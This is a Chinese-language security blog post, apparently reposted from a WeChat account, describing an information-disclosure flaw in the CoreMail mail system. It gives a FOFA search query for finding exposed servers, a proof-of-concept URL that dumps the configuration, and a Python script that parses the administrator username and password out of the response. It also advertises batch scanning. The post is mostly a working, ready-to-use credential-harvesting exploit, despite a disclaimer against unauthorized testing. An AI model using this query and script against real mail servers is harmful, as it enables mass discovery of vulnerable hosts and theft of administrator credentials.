CoreMail信息泄露

admin 2021年4月21日22:29:50评论276 views字数 706阅读2分21秒阅读模式

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!

FOFA语法:

app="Coremail-邮件系统"


POC:

url/mailsms/s?func=ADMIN:appState&dumpConfig=/


利用脚本代码:

def poc(url):  target = url+"/mailsms/s?func=ADMIN:appState&dumpConfig=/"  r = requests.get(url=target,verify=False,timeout=8)  print('-'*50)  if r.status_code==200 and "S_OK" in r.text:    print(url+"    "+"漏洞存在!")    a = str(r.text)    match = re.findall(r'<string name="Password">(.*?)</string>',a,re.I|re.M)    match1 = re.findall(r'<string name="User">(.*?)</string>',a,re.I|re.M)    if match1:      print("账号为:"+match1[1])    else:      print("账号未找到")    if match:      print("密码为:"+match[6])    else:      print("密码未找到")  else:    print(url+"    "+"漏洞不存在!")

需要脚本请直接在公众号回复联系作者:CoreMail

支持批量扫描,支持直接输出账号密码

CoreMail信息泄露


本文始发于微信公众号(Fight Tigers Team):CoreMail信息泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月21日22:29:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CoreMail信息泄露http://cn-sec.com/archives/339738.html

发表评论

匿名网友 填写信息